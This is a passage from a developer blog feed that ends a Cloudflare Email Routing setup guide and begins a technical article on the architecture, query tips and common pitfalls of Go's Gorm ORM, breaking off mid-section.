&lt;p&gt;After logging into Cloudflare, find the domain you want to set up in the domain list on the homepage (such as my devresourcehub.com) and click to enter the domain management backend. Locate “Email” – “Email Routing” in the left sidebar menu and click to enter the function page.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fallb4dnmc25c4x0yi6vh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fallb4dnmc25c4x0yi6vh.png" width="800" height="416"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Create a Custom Email Address
&lt;/h3&gt;

&lt;p&gt;On the Email Routing page, click “Get Started” and fill in the relevant information in the subsequent form:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Custom Address&lt;/strong&gt;: Enter the email prefix. For example, if I want a dedicated contact email for the website, I’ll enter “contact”, and the final email will be &lt;a href="mailto:contact@devresourcehub.com"&gt;contact@devresourcehub.com&lt;/a&gt;. For other types of emails, you can use common prefixes like your “name” or “support”.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Action&lt;/strong&gt;: Select “Send to email” (beginners can start with the basic forwarding function; advanced features like setting rules can be explored later).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Destination&lt;/strong&gt;: Enter your personal email (such as Microsoft Outlook or Gmail). All future emails sent to the custom email will be forwarded here.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6knp71to25yatjjbycg9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6knp71to25yatjjbycg9.png" width="800" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6z3b9gyf7pxe5m8jfynu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6z3b9gyf7pxe5m8jfynu.png" width="800" height="523"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Complete Email Verification and DNS Configuration
&lt;/h3&gt;

&lt;p&gt;After clicking “Save”, Cloudflare will send a verification email to the destination email you entered. Open the email and click the verification link to confirm that the email can receive messages normally.&lt;/p&gt;

&lt;p&gt;After verification, the system will prompt you to configure DNS records—don’t worry, Cloudflare has already generated the required records for you. Just click “Add records and enable” to complete the configuration automatically; no manual modification of DNS parameters is needed.&lt;/p&gt;
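&lt;p&gt;For reference, the records Cloudflare adds at this step are MX entries pointing at Cloudflare’s mail routers plus an SPF TXT record. They look roughly like the following (the hostnames, priorities, and SPF value shown here are illustrative; always use the exact values Cloudflare generates for your zone):&lt;/p&gt;

```
; MX records – deliver inbound mail for the domain to Cloudflare
devresourcehub.com.  MX  10  route1.mx.cloudflare.net.
devresourcehub.com.  MX  20  route2.mx.cloudflare.net.
devresourcehub.com.  MX  30  route3.mx.cloudflare.net.

; TXT (SPF) record – authorizes Cloudflare to handle mail for the domain
devresourcehub.com.  TXT  "v=spf1 include:_spf.mx.cloudflare.net ~all"
```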

&lt;p&gt;Since my destination email is the same as my Cloudflare account email, no verification was required, and it was set up directly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F08an3krdb89eoij7f1dn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F08an3krdb89eoij7f1dn.png" width="800" height="412"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Final Step: Test if the Email Works
&lt;/h2&gt;

&lt;p&gt;After configuration, be sure to test it with another email account (such as a friend’s email or another personal email): send an email to the custom domain address you just created (e.g., &lt;a href="mailto:contact@devresourcehub.com"&gt;contact@devresourcehub.com&lt;/a&gt;) and then check whether the destination personal email receives it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr780lv53ak1ggle8zw57.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr780lv53ak1ggle8zw57.png" width="772" height="410"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If it arrives normally, the whole setup is successful. If not, first check whether the DNS configuration has taken effect (there may be a 1-5 minute delay), then check the spam folder of the destination email.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frnkk7ivejs9c9i63qxls.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frnkk7ivejs9c9i63qxls.png" width="800" height="232"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After testing, I found that forwarding works successfully, as shown in the image above.&lt;/p&gt;

&lt;p&gt;If you still can’t find the email even after checking the spam folder, check the Email Routing logs in Cloudflare. For example, when I used a Microsoft email address, Microsoft’s mail servers had blacklisted the IP of Cloudflare’s forwarding server, causing forwarding to fail. The fix is either to contact the destination email provider’s support or to switch to a different destination email.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ys4hm4curckwtca5io4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ys4hm4curckwtca5io4.png" width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Tip: If you want your custom email to send mail directly (not just receive and forward), pair it with a third-party SMTP service such as SendGrid. However, for most personal bloggers and small site owners, simple receiving and forwarding is sufficient.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;In this way, you’ll have a professional brand email tied to your domain. Whether it’s for external communication, user feedback, or business cooperation, it can enhance your brand image and trust. The entire process is completely free and easy to operate—if you haven’t set it up yet, give it a try!&lt;/p&gt;

</description>
      <category>cloudflare</category>
      <category>mail</category>
    </item>
    <item>
      <title>A Deep Dive into Gorm: Architecture, Workflow, Tips, and Troubleshooting for Go’s ORM Framework</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Sun, 02 Nov 2025 11:15:11 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/a-deep-dive-into-gorm-architecture-workflow-tips-and-troubleshooting-for-go-2ld9</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/a-deep-dive-into-gorm-architecture-workflow-tips-and-troubleshooting-for-go-2ld9</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This article details the internal architecture and SQL execution workflow of Gorm, the popular ORM framework for Go. It shares practical techniques for model definition, querying, and updating, while solving common issues like time zone discrepancies, soft deletion, and transactions. It is tailored for &lt;strong&gt;advanced Gorm developers&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/a-deep-dive-into-gorm-architecture-workflow-tips-and-troubleshooting-for-gos-orm-framework.html" rel="noopener noreferrer"&gt;Dev Resource Hub&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;As the most widely used ORM (Object-Relational Mapping) framework in the Go ecosystem, Gorm significantly simplifies database operations. However, most developers only utilize its basic features and have limited knowledge of its internal logic and advanced techniques. Starting from Gorm’s core principles, this article combines real-world development scenarios to outline its SQL execution workflow, practical functions, and common pitfalls, helping you move from “knowing how to use it” to “mastering it”.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Gorm Core Concepts &amp;amp; Architecture
&lt;/h2&gt;

&lt;p&gt;To use Gorm proficiently, you first need to understand its design logic. At its heart, Gorm is a “SQL codification tool” that converts developer method calls into SQL statements and interacts with the database.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 What is ORM?
&lt;/h3&gt;

&lt;p&gt;ORM (Object-Relational Mapping) serves as a bridge between code and databases, with three core functions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Mapping database tables to Go structs&lt;/li&gt;
&lt;li&gt;  Mapping table columns to struct fields&lt;/li&gt;
&lt;li&gt;  Converting struct operations to SQL statements&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Its advantages are clear:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  No need to write raw SQL&lt;/li&gt;
&lt;li&gt;  Reduces error rates&lt;/li&gt;
&lt;li&gt;  Supports multiple databases (MySQL, PostgreSQL, etc.)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;However, it also has limitations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Auto-generated SQL may not be optimal&lt;/li&gt;
&lt;li&gt;  Requires learning framework-specific rules&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  1.2 Gorm Code Architecture
&lt;/h3&gt;

&lt;p&gt;Gorm uses several core objects to implement “method-to-SQL conversion”. Understanding these objects is key to grasping its overall logic:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Object&lt;/th&gt;
&lt;th&gt;Core Role&lt;/th&gt;
&lt;th&gt;Key Attributes / Functions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;DB&lt;/td&gt;
&lt;td&gt;Database connection instance&lt;/td&gt;
&lt;td&gt;Manages connections, stores configuration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Config&lt;/td&gt;
&lt;td&gt;Stores user settings&lt;/td&gt;
&lt;td&gt;Controls plural table names, DryRun mode, prepared statements, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Statement&lt;/td&gt;
&lt;td&gt;Maps SQL statements&lt;/td&gt;
&lt;td&gt;Stores WHERE conditions, SELECT fields, table names, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Schema&lt;/td&gt;
&lt;td&gt;Maps database table structures&lt;/td&gt;
&lt;td&gt;Associates structs with table names and field mappings&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Field&lt;/td&gt;
&lt;td&gt;Maps table column details&lt;/td&gt;
&lt;td&gt;Stores column names, data types, primary key/non-null status, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Gorm’s methods fall into two categories, and the method chain follows a process of “assembling SQL → executing SQL”:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Process methods&lt;/strong&gt;: Only assemble SQL (no execution), e.g., &lt;code&gt;Where&lt;/code&gt; (add conditions), &lt;code&gt;Select&lt;/code&gt; (specify fields), &lt;code&gt;Model&lt;/code&gt; (bind a struct).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Terminator methods&lt;/strong&gt;: Execute SQL after assembly and parse results, e.g., &lt;code&gt;Find&lt;/code&gt; (query), &lt;code&gt;Create&lt;/code&gt; (insert), &lt;code&gt;Update&lt;/code&gt; (update), &lt;code&gt;Delete&lt;/code&gt; (delete).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  1.3 Relationship Between trpc-go/gorm and Native Gorm
&lt;/h3&gt;

&lt;p&gt;If your project uses the trpc-go framework, you may encounter the &lt;code&gt;trpc-go/trpc-database/gorm&lt;/code&gt; package. It is not a reimplementation of Gorm but a wrapper for native Gorm, with three core advantages:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Simplifies database connection configuration, eliminating repetitive initialization code.&lt;/li&gt;
&lt;li&gt; Integrates Gorm into trpc-go services, supporting unified framework configuration.&lt;/li&gt;
&lt;li&gt; Provides Polaris dynamic service discovery for flexible database switching.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  2. How Does a SQL Statement Execute in Gorm?
&lt;/h2&gt;

&lt;p&gt;Let’s take a common Gorm query code snippet and break down its execution process to understand the full workflow from “method call” to “database response”:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;var user User
db := db.Model(user).Select("age", "name").Where("age = ?", 18).Or("name = ?", "tencent").Find(&amp;amp;user)
if err := db.Error; err != nil {log.Printf("Find failed, err: %v", err)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.1 Full Execution Workflow
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Preparations
&lt;/h4&gt;

&lt;p&gt;Call &lt;code&gt;gorm.Open()&lt;/code&gt; to create a &lt;code&gt;DB&lt;/code&gt; object based on the database type (e.g., MySQL) and DSN, then initialize the connection.&lt;/p&gt;

&lt;h4&gt;
  
  
  SQL Assembly (Process Methods)
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; &lt;code&gt;Model(user)&lt;/code&gt;: Informs Gorm to operate on the table associated with &lt;code&gt;user&lt;/code&gt; and updates the table name in &lt;code&gt;Statement&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt; &lt;code&gt;Select("age", "name")&lt;/code&gt;: Adds the fields to be queried to &lt;code&gt;Statement.Selects&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt; &lt;code&gt;Where(...)&lt;/code&gt; and &lt;code&gt;Or(...)&lt;/code&gt;: Parses conditions, generates &lt;code&gt;WHERE age = 18 OR name = 'tencent'&lt;/code&gt;, and stores it in &lt;code&gt;Statement.Clauses&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  SQL Execution (Terminator Method &lt;code&gt;Find&lt;/code&gt;)
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; Checks &lt;code&gt;Statement&lt;/code&gt; and completes the SQL statement (e.g., &lt;code&gt;SELECT age, name FROM users WHERE ...&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt; Calls the database driver’s &lt;code&gt;QueryContext&lt;/code&gt; to send the SQL to the database.&lt;/li&gt;
&lt;li&gt; Receives the database response, parses the results, and populates them into &lt;code&gt;&amp;amp;user&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt; Stores error information, affected row counts, etc., in the &lt;code&gt;DB&lt;/code&gt; object and returns it to the developer.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  2.2 Key Code Snippets
&lt;/h3&gt;

&lt;p&gt;Taking &lt;code&gt;Select&lt;/code&gt; and &lt;code&gt;Where&lt;/code&gt; as examples, here’s how Gorm assembles SQL:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Select method: Adds fields to Statement.Selects
func (db *DB) Select(query interface{}, args ...interface{}) (tx *DB) {
  tx = db.getInstance()
  // Parses incoming fields (e.g., "age" or []string{"age", "name"})
  switch v := query.(type) {
  case string:
    tx.Statement.Selects = append(tx.Statement.Selects, v)
  case []string:
    tx.Statement.Selects = append(tx.Statement.Selects, v...)
  }
  return tx
}

// Where method: Adds conditions to Statement.Clauses
func (db *DB) Where(query interface{}, args ...interface{}) (tx *DB) {
  tx = db.getInstance()
  // Parses conditions and generates Clause objects
  if conds := tx.Statement.BuildCondition(query, args...); len(conds) &amp;gt; 0 {
    tx.Statement.AddClause(clause.Where{Exprs: conds})
  }
  return tx
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. Gorm Practical Tips: Filling Knowledge Gaps
&lt;/h2&gt;

&lt;p&gt;Many practical Gorm features are easily overlooked in daily development. Mastering these can significantly improve efficiency.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Model Definition Tips
&lt;/h3&gt;

&lt;p&gt;Models are the foundation of Gorm’s database interactions. Pay attention to these details:&lt;/p&gt;

&lt;h4&gt;
  
  
  Controlling Table Name Plurality
&lt;/h4&gt;

&lt;p&gt;Gorm defaults to converting struct names to plural table names (e.g., &lt;code&gt;User&lt;/code&gt; → &lt;code&gt;users&lt;/code&gt;). To disable this, configure it during initialization:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;db, err := gorm.Open(mysql.Open(dsn), &amp;amp;gorm.Config{
  NamingStrategy: schema.NamingStrategy{SingularTable: true, // Disable plural table names},
})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Embedding Base Models
&lt;/h4&gt;

&lt;p&gt;Gorm provides a &lt;code&gt;gorm.Model&lt;/code&gt; struct that includes &lt;code&gt;ID&lt;/code&gt;, &lt;code&gt;CreatedAt&lt;/code&gt;, &lt;code&gt;UpdatedAt&lt;/code&gt;, and &lt;code&gt;DeletedAt&lt;/code&gt;. Embed it in your custom struct to avoid redefining these common fields:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;type User struct {
  gorm.Model // Embeds the base model, automatically adding 4 common fields
  Name string
  Age  int
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note: Embedding &lt;code&gt;DeletedAt&lt;/code&gt; automatically enables &lt;strong&gt;soft deletion&lt;/strong&gt; (deletion only updates &lt;code&gt;DeletedAt&lt;/code&gt; instead of physically removing data).&lt;/p&gt;

&lt;h4&gt;
  
  
  Struct Embedding (Embed)
&lt;/h4&gt;

&lt;p&gt;For structs with many fields, split related fields into sub-structs. Use the &lt;code&gt;embedded&lt;/code&gt; tag to associate them, and &lt;code&gt;embeddedPrefix&lt;/code&gt; to add field prefixes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Sub-struct
type Author struct {
  Name  string `gorm:"column:name"`
  Email string `gorm:"column:email"`
}

// Main struct (with embed association)
type Blog struct {
  ID      int    `gorm:"column:id"`
  Author  Author `gorm:"embedded;embeddedPrefix:author_"` // Fields become author_name, author_email
  Upvotes int32  `gorm:"column:upvotes"`
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 Query Optimization Tips
&lt;/h3&gt;

&lt;p&gt;Queries are high-frequency operations. Choosing the right method reduces performance overhead:&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;code&gt;First&lt;/code&gt;/&lt;code&gt;Take&lt;/code&gt;/&lt;code&gt;Last&lt;/code&gt; vs. &lt;code&gt;Find&lt;/code&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;First&lt;/code&gt;/&lt;code&gt;Take&lt;/code&gt;/&lt;code&gt;Last&lt;/code&gt;: Return &lt;code&gt;ErrRecordNotFound&lt;/code&gt; if no data is found and automatically add &lt;code&gt;LIMIT 1&lt;/code&gt;. Suitable for “single-record queries” (e.g., query by primary key).&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;Find&lt;/code&gt;: Does not return an error if no data is found and queries all matching records. Suitable for “multi-record queries” or “primary key/unique key equality queries” (avoids extra error checks).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Simplifying Query Conditions
&lt;/h4&gt;

&lt;p&gt;For simple conditions, skip &lt;code&gt;Where&lt;/code&gt; and write conditions directly in &lt;code&gt;Find&lt;/code&gt; for cleaner code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Equivalent to: db.Where("status = ? and update_time &amp;lt; ?", 1, time.Now()).Find(&amp;amp;user)
db.Find(&amp;amp;user, "status = ? and update_time &amp;lt; ?", 1, time.Now())
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Using &lt;code&gt;Pluck&lt;/code&gt; for Single-Field Queries
&lt;/h4&gt;

&lt;p&gt;When only one column of data is needed, &lt;code&gt;Pluck&lt;/code&gt; is more intuitive than &lt;code&gt;Select&lt;/code&gt; + &lt;code&gt;Find&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;var ages []int64
// Equivalent to: db.Model(&amp;amp;User{}).Select("age").Find(&amp;amp;ages)
db.Model(&amp;amp;User{}).Pluck("age", &amp;amp;ages)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.3 Update Pitfalls to Avoid
&lt;/h3&gt;

&lt;p&gt;The most common pitfall in updates is “zero values not being updated”. Remember these two solutions:&lt;/p&gt;

&lt;h4&gt;
  
  
  Using &lt;code&gt;map&lt;/code&gt; to Update Zero Values
&lt;/h4&gt;

&lt;p&gt;Gorm does not update zero values in structs (e.g., &lt;code&gt;false&lt;/code&gt; for &lt;code&gt;bool&lt;/code&gt; types) by default. Use &lt;code&gt;map[string]interface{}&lt;/code&gt; to force updates:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Incorrect: Active: false is a zero value and will not be updated
db.Model(&amp;amp;user).Updates(User{ID: 111, Name: "hello", Active: false})

// Correct: Use map to force update all fields
db.Model(&amp;amp;user).Updates(map[string]interface{}{"id": 111, "name": "hello", "active": false})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Using &lt;code&gt;Select&lt;/code&gt; to Specify Update Fields
&lt;/h4&gt;

&lt;p&gt;If you must use a struct, explicitly specify fields to update via &lt;code&gt;Select&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;db.Model(&amp;amp;user).Select("name", "active").Updates(User{ID: 111, Name: "hello", Active: false})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.4 Safe Testing: The &lt;code&gt;DryRun&lt;/code&gt; Feature
&lt;/h3&gt;

&lt;p&gt;If you don’t have a test environment and fear dirty data from SQL errors, enable &lt;code&gt;DryRun&lt;/code&gt; mode. Gorm will print SQL without executing it, allowing pre-verification:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;db, err := gorm.Open(mysql.Open(dsn), &amp;amp;gorm.Config{DryRun: true, // Enable dry-run mode})
// Only prints SQL, no actual data deletion
db.Where("age &amp;lt; ?", 18).Delete(&amp;amp;User{})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. Solutions to Common Gorm Issues
&lt;/h2&gt;

&lt;p&gt;Most exceptions encountered in development stem from insufficient understanding of Gorm details. Remember these high-frequency issues:&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 8-Hour Time Zone Discrepancy? Add &lt;code&gt;loc=Local&lt;/code&gt; to DSN
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: &lt;code&gt;time.Now()&lt;/code&gt; in code returns the current local time, but the time stored in the database is 8 hours behind. &lt;strong&gt;Cause&lt;/strong&gt;: Gorm’s driver treats times as UTC by default, while &lt;code&gt;time.Now()&lt;/code&gt; returns local time (e.g., Beijing time, UTC+8), producing an 8-hour offset. &lt;strong&gt;Solution&lt;/strong&gt;: Add &lt;code&gt;loc=Local&lt;/code&gt; to the DSN when initializing the &lt;code&gt;DB&lt;/code&gt; object so Gorm uses the system time zone:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// DSN format (key: add loc=Local at the end)
dsn := "root:password@tcp(127.0.0.1:3306)/dbname?charset=utf8mb4&amp;amp;parseTime=True&amp;amp;loc=Local"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 How to Implement Soft Deletion? Embed &lt;code&gt;DeletedAt&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Want to “mark data as deleted without physically removing it”. &lt;strong&gt;Solution&lt;/strong&gt;: Embed &lt;code&gt;gorm.DeletedAt&lt;/code&gt; (or directly embed &lt;code&gt;gorm.Model&lt;/code&gt;) in the struct. Gorm will handle it automatically:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  On deletion: Executes &lt;code&gt;UPDATE users SET deleted_at = current_time WHERE ...&lt;/code&gt; (no physical deletion).&lt;/li&gt;
&lt;li&gt;  On query: Automatically adds &lt;code&gt;WHERE deleted_at IS NULL&lt;/code&gt; (excludes deleted data).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To query deleted data, use &lt;code&gt;Unscoped()&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Query all data, including deleted records
db.Unscoped().Find(&amp;amp;users)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Transactions Are Not “Batched SQL Execution”—They Rely on Native Database Support
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Assuming Gorm transactions “store SQL first and send it all on commit”, but results are returned immediately after &lt;code&gt;Select&lt;/code&gt;. Why? &lt;strong&gt;Truth&lt;/strong&gt;: Gorm transactions depend on native database support, with real-time interaction at each step:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;code&gt;tx := db.Begin()&lt;/code&gt;: Sends &lt;code&gt;START TRANSACTION&lt;/code&gt; to the database.&lt;/li&gt;
&lt;li&gt; &lt;code&gt;tx.Find(&amp;amp;user)&lt;/code&gt;: Sends &lt;code&gt;SELECT ...&lt;/code&gt; to the database and returns results in real time.&lt;/li&gt;
&lt;li&gt; &lt;code&gt;tx.Commit()&lt;/code&gt;: Sends &lt;code&gt;COMMIT&lt;/code&gt; to the database to confirm the transaction.&lt;/li&gt;
&lt;li&gt; If an error occurs, &lt;code&gt;tx.Rollback()&lt;/code&gt;: Sends &lt;code&gt;ROLLBACK&lt;/code&gt; to undo the transaction.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  4.4 Bulk Creation &amp;amp; Primary Key Conflict Handling
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Bulk Creation
&lt;/h4&gt;

&lt;p&gt;Use &lt;code&gt;CreateInBatches&lt;/code&gt; and specify a batch size (to avoid overly long SQL statements):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;var users []User
// Assume users contains 100 records
db.CreateInBatches(users, 50) // Insert in 2 batches of 50 records each
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Primary Key / Unique Key Conflict Handling
&lt;/h4&gt;

&lt;p&gt;Use &lt;code&gt;clause.OnConflict&lt;/code&gt; to specify a conflict strategy. On MySQL, Gorm generates an &lt;code&gt;ON DUPLICATE KEY UPDATE&lt;/code&gt; statement (the conflict-resolution logic itself is implemented by the database):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
